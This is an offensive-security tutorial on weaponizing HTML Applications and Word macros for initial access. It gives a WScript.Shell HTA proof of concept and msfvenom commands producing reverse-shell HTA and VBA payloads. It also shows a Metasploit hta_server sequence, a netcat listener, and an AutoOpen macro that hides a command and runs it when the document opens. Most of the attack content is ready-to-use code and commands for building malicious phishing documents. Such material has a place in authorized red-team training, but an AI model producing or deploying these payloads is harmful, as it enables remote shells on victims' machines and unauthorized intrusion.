
Weaponization

In the Weaponization stage the attacker pairs malicious code (shellcode, a stager or a downloader) with a deliverable carrier such as a Word document, a PDF or an HTML Application, producing the file that will later be sent to the target. The goal is a weapon that, once opened, exploits or abuses the target machine and gives the attacker initial access.


HTML Application (HTA)

An HTML Application (HTA) is an HTML page, usually carrying embedded JScript or VBScript, saved with the .hta extension and executed by mshta.exe rather than by a browser. Unlike an ordinary web page, an HTA runs outside the browser sandbox with the privileges of the user who launched it, so its script can instantiate COM objects such as WScript.Shell and start arbitrary processes. An HTA can be run on its own (double-clicked, or with mshta <file-or-URL> from a command line) or launched automatically by Internet Explorer once the user accepts the download prompt.


This proof-of-concept payload uses an ActiveXObject to start cmd.exe. Host the file on a web server under our control; when the victim opens the .hta file, mshta.exe runs the script and cmd.exe is launched.

<Payload_Name>.hta
<html>
<body>
<script>
// A <script> block without a language attribute is JScript in an HTA
// Command to run; any executable or command line works here
var c = 'cmd.exe';
// WScript.Shell is a COM object reachable through ActiveX from an HTA;
// Run() starts the command in a new process under the current user
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

HTA Reverse Connection

We can use msfvenom from the Metasploit Framework to generate a malicious HTA that connects back to the attacker machine. The hta-psh format wraps the payload in an HTA whose script launches powershell.exe with the encoded payload, so PowerShell must be available on the target. Start a listener on the attacker machine before the victim opens the file (for example nc -lvnp <PORT>, or exploit/multi/handler with the same payload, LHOST and LPORT).

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f hta-psh -o <Output>

Malicious HTA via Metasploit

Metasploit's hta_server module generates a malicious HTA, serves it over HTTP and starts the matching handler in one step. SRVHOST is the address the HTTP server binds to; LHOST and LPORT are where the payload connects back.

On the victim machine, once the URL printed by Metasploit is visited (in a browser, or directly with mshta <URL>), we should receive a reverse connection.

use exploit/windows/misc/hta_server
set LHOST <IP>
set LPORT <PORT>
set SRVHOST <IP>
set payload windows/meterpreter/reverse_tcp
run

Visual Basic for Applications (VBA)

VBA is a programming language from Microsoft that is built into Microsoft Office applications such as Word, Excel and PowerPoint. It can automate nearly every keyboard and mouse interaction a user has with those applications.

A macro is VBA code embedded in an Office document. Macros are meant to speed up manual tasks by wrapping them in custom functions and automated processes, but because VBA can call the Windows Application Programming Interface (API) and other low-level functionality, a macro can also do anything else the user can do, including starting processes.


  • Open Microsoft Word:
    • Select Blank Document.
    • Click View.
    • Click Macros, then View Macros.
    • Assign the macro name (this becomes the name of the Sub).
    • Click Create (or Edit, for an existing macro) to open the Visual Basic editor.

Info

To make the macro work, the document must be saved in a macro-enabled format such as .doc or .docm; the default .docx format cannot contain macros.

Info

When the document is opened, Microsoft Word shows a security warning that macros have been disabled and offers an option to enable them. The macro only runs once the user clicks Enable Content.


  • We can run the macro from the editor by pressing F5 or choosing Run > Run Sub/UserForm.
Sub Function_Name()
' Displays a dialog box; a simple way to confirm that the macro executes
MsgBox ("Custom Message!")
End Sub
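Running a macro with F5 only works while we sit in the editor; for a weaponized document the macro has to fire by itself when the victim opens the file. The following added example (it is not from the original page) completes the procedure above with an auto-executing Word macro that uses the same WScript.Shell technique as the HTA proof of concept. The command line it launches is a placeholder chosen for illustration.

```vba
' Added example: a Word macro that runs when the document is opened.
' Place this in a standard module (the one the View Macros > Create
' step opens), then save the document as .docm or .doc.
Option Explicit

' Word runs a public Sub named AutoOpen from any standard module as soon
' as the document opens and macros are enabled. (The equivalent event
' handler, Document_Open, would have to live in the ThisDocument class
' module instead; Excel uses Auto_Open or Workbook_Open.)
Public Sub AutoOpen()
    Launch
End Sub

' Same technique as the HTA proof of concept: create a WScript.Shell COM
' object and call Run to start a new process as the current user.
Private Sub Launch()
    Dim cmd As String
    ' Placeholder command for the example; the real payload goes here.
    cmd = "cmd.exe /c whoami > %TEMP%\who.txt"
    ' vbHide keeps the window invisible (use vbNormalFocus while testing);
    ' False makes Run return immediately instead of waiting for exit.
    CreateObject("WScript.Shell").Run cmd, vbHide, False
End Sub
```

To test it, save the document, close it and reopen it: the security warning appears, and the command runs only after Enable Content is clicked. Deleting AutoOpen or renaming it to Function_Name makes the macro inert again, which is a quick way to confirm the trigger is the name rather than the code.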


VBA Reverse Connection

We can use msfvenom from the Metasploit Framework to generate a malicious VBA macro that connects back to the attacking machine.

Copy the output and paste it into the macro editor of the Word document in place of the empty Sub created above, then save the document in a macro-enabled format. The generated macro declares its own Auto_Open entry point, so it runs as soon as the document is opened and macros are enabled. Choose the payload architecture to match the installed Office build (x86 or x64), because the shellcode executes inside the Office process, and start a matching listener before the document is opened.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba